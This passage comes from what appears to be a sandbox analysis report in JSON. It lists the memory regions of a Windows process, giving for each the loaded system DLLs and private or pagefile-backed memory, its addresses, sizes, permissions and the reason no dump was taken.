"c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1950154752, "timestamp": "00:07:38.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1950220288, "type": "region", "version": 1 }, "end_va": 1950597119, "entry_point": 1950220288, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_4001", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1950220288, "timestamp": "00:07:38.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1950613504, "type": "region", "version": 1 }, "end_va": 1950871551, "entry_point": 1950613504, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_4002", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1950613504, "timestamp": "00:07:38.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_4003", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:07:38.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_4004", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:07:38.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 262143, "entry_point": 0, "filename": null, "id": "region_4005", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:07:38.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2846719, "entry_point": 2424832, "filename": "\\Windows\\System32\\locale.nls", "id": "region_4006", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2424832, "timestamp": "00:07:38.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5505024, "type": "region", "version": 1 }, "end_va": 6553599, "entry_point": 0, "filename": null, "id": "region_4007", "name": "private_0x0000000000540000", "norm_filename": null, "region_type": "private_memory", "start_va": 5505024, "timestamp": "00:07:38.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1971322880, "type": "region", "version": 1 }, "end_va": 1971372031, "entry_point": 1971322880, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_4008", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1971322880, "timestamp": "00:07:38.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1971781631, "entry_point": 1971388416, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_4009", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:07:38.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973157888, "type": "region", "version": 1 }, "end_va": 1974271999, "entry_point": 1973157888, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_4010", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973157888, "timestamp": "00:07:38.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1978073088, "type": "region", "version": 1 }, "end_va": 1978777599, "entry_point": 1978073088, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_4011", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1978073088, "timestamp": "00:07:38.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1986265088, "type": "region", "version": 1 }, "end_va": 1986551807, "entry_point": 1986265088, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_4012", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1986265088, "timestamp": "00:07:38.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1987903488, "type": "region", "version": 1 }, "end_va": 1988005887, "entry_point": 1987903488, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_4013", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1987903488, "timestamp": "00:07:38.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1988100096, "type": "region", "version": 1 }, "end_va": 1989083135, "entry_point": 1988100096, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_4014", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1988100096, "timestamp": "00:07:38.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2005598208, "type": "region", "version": 1 }, "end_va": 2006622207, "entry_point": 0, "filename": null, "id": "region_4015", "name": "private_0x00000000778b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2005598208, "timestamp": "00:07:38.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2006646784, "type": "region", "version": 1 }, "end_va": 2007822335, "entry_point": 0, "filename": null, "id": "region_4016", "name": "private_0x00000000779b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2006646784, "timestamp": "00:07:38.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_4017", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:07:38.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4018", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:07:38.084", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1972109312, "type": "region", "version": 1 }, "end_va": 1973157887, "entry_point": 1972109312, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_4019", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1972109312, "timestamp": "00:07:38.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1989476352, "type": "region", "version": 1 }, "end_va": 1990066175, "entry_point": 1989476352, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_4020", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1989476352, "timestamp": "00:07:38.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989124095, "entry_point": 1989083136, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_4021", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:07:38.090", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1980825600, "type": "region", "version": 1 }, "end_va": 1981468671, "entry_point": 1980825600, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_4022", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1980825600, "timestamp": "00:07:38.091", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 2004090880, "type": "region", "version": 1 }, "end_va": 2004746239, "entry_point": 2004090880, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_4023", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 2004090880, "timestamp": "00:07:38.091", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 122880, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 712703, "entry_point": 589824, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_4024", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 589824, "timestamp": "00:07:38.093", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6553600, "type": "region", "version": 1 }, "end_va": 8159231, "entry_point": 0, "filename": null, "id": "region_4025", "name": "pagefile_0x0000000000640000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6553600, "timestamp": "00:07:38.093", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1980432384, "type": "region", "version": 1 }, "end_va": 1980825599, "entry_point": 1980432384, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_4027", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1980432384, "timestamp": "00:07:38.094", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1985413120, "type": "region", "version": 1 }, "end_va": 1986248703, "entry_point": 1985413120, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_4028", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1985413120, "timestamp": "00:07:38.095", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8192000, "type": "region", "version": 1 }, "end_va": 9768959, "entry_point": 0, "filename": null, "id": "region_4029", "name": "pagefile_0x00000000007d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8192000, "timestamp": "00:07:38.096", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9830400, "type": "region", "version": 1 }, "end_va": 30801919, "entry_point": 0, "filename": null, "id": "region_4030", "name": "pagefile_0x0000000000960000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9830400, "timestamp": "00:07:38.096", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_4031", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:07:38.099", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 598015, "entry_point": 0, "filename": null, "id": "region_4032", "name": "pagefile_0x0000000000090000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 589824, "timestamp": "00:07:38.099", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_4033", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:07:38.099", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 724991, "entry_point": 0, "filename": null, "id": "region_4034", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:07:38.099", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 30801920, "type": "region", "version": 1 }, "end_va": 34942975, "entry_point": 0, "filename": null, "id": "region_4035", "name": "pagefile_0x0000000001d60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30801920, "timestamp": "00:07:38.099", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1982070784, "type": "region", "version": 1 }, "end_va": 1983238143, "entry_point": 1982070784, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_4036", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1982070784, "timestamp": "00:07:38.101", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1983250432, "type": "region", "version": 1 }, "end_va": 1983299583, "entry_point": 1983250432, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_4037", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1983250432, "timestamp": "00:07:38.101", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1990656000, "type": "region", "version": 1 }, "end_va": 2003542015, "entry_point": 1990656000, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_4038", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1990656000, "timestamp": "00:07:38.105", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1983315968, "type": "region", "version": 1 }, "end_va": 1983672319, "entry_point": 1983315968, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_4039", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1983315968, "timestamp": "00:07:38.106", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1974272000, "type": "region", "version": 1 }, "end_va": 1974292479, "entry_point": 1974272000, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_4040", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1974272000, "timestamp": "00:07:38.109", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1974337536, "type": "region", "version": 1 }, "end_va": 1975762943, "entry_point": 1974337536, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_4041", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1974337536, "timestamp": "00:07:38.109", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1978793984, "type": "region", "version": 1 }, "end_va": 1979797503, "entry_point": 1978793984, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_4042", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1978793984, "timestamp": "00:07:38.112", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987862527, "entry_point": 1986592768, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_4043", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:07:38.112", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1981480960, "type": "region", "version": 1 }, "end_va": 1982066687, "entry_point": 1981480960, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_4044", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1981480960, "timestamp": "00:07:38.112", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1975779328, "type": "region", "version": 1 }, "end_va": 1977855999, "entry_point": 1975779328, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_4045", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1975779328, "timestamp": "00:07:38.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1969815552, "type": "region", "version": 1 }, "end_va": 1969848319, "entry_point": 1969815552, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_4046", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1969815552, "timestamp": "00:07:38.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 983040, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 4521983, "entry_point": 0, "filename": null, "id": "region_4047", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:07:38.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1969684480, "type": "region", "version": 1 }, "end_va": 1969774591, "entry_point": 1969684480, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_4048", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1969684480, "timestamp": "00:07:38.117", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2146303, "entry_point": 1900544, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_4049", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1900544, "timestamp": "00:07:38.118", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1969422336, "type": "region", "version": 1 }, "end_va": 1969663999, "entry_point": 1969422336, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_4054", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1969422336, "timestamp": "00:07:38.124", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34996224, "type": "region", "version": 1 }, "end_va": 37941247, "entry_point": 34996224, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_4055", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34996224, "timestamp": "00:07:38.125", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_4056", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_4057", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4521983, "entry_point": 0, "filename": null, "id": "region_4058", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 0, "filename": null, "id": "region_4059", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37945344, "type": "region", "version": 1 }, "end_va": 38207487, "entry_point": 0, "filename": null, "id": "region_4060", "name": "private_0x0000000002430000", "norm_filename": null, "region_type": "private_memory", "start_va": 37945344, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38273024, "type": "region", "version": 1 }, "end_va": 38535167, "entry_point": 0, "filename": null, "id": "region_4061", "name": "private_0x0000000002480000", "norm_filename": null, "region_type": "private_memory", "start_va": 38273024, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38928384, "type": "region", "version": 1 }, "end_va": 39190527, "entry_point": 0, "filename": null, "id": "region_4062", "name": "private_0x0000000002520000", "norm_filename": null, "region_type": "private_memory", "start_va": 38928384, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39387136, "type": "region", "version": 1 }, "end_va": 39649279, "entry_point": 0, "filename": null, "id": "region_4063", "name": "private_0x0000000002590000", "norm_filename": null, "region_type": "private_memory", "start_va": 39387136, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39714816, "type": "region", "version": 1 }, "end_va": 39976959, "entry_point": 0, "filename": null, "id": "region_4064", "name": "private_0x00000000025e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39714816, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 40435712, "type": "region", "version": 1 }, "end_va": 40697855, "entry_point": 0, "filename": null, "id": "region_4065", "name": "private_0x0000000002690000", "norm_filename": null, "region_type": "private_memory", "start_va": 40435712, "timestamp": "00:07:38.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 40697856, "type": "region", "version": 1 }, "end_va": 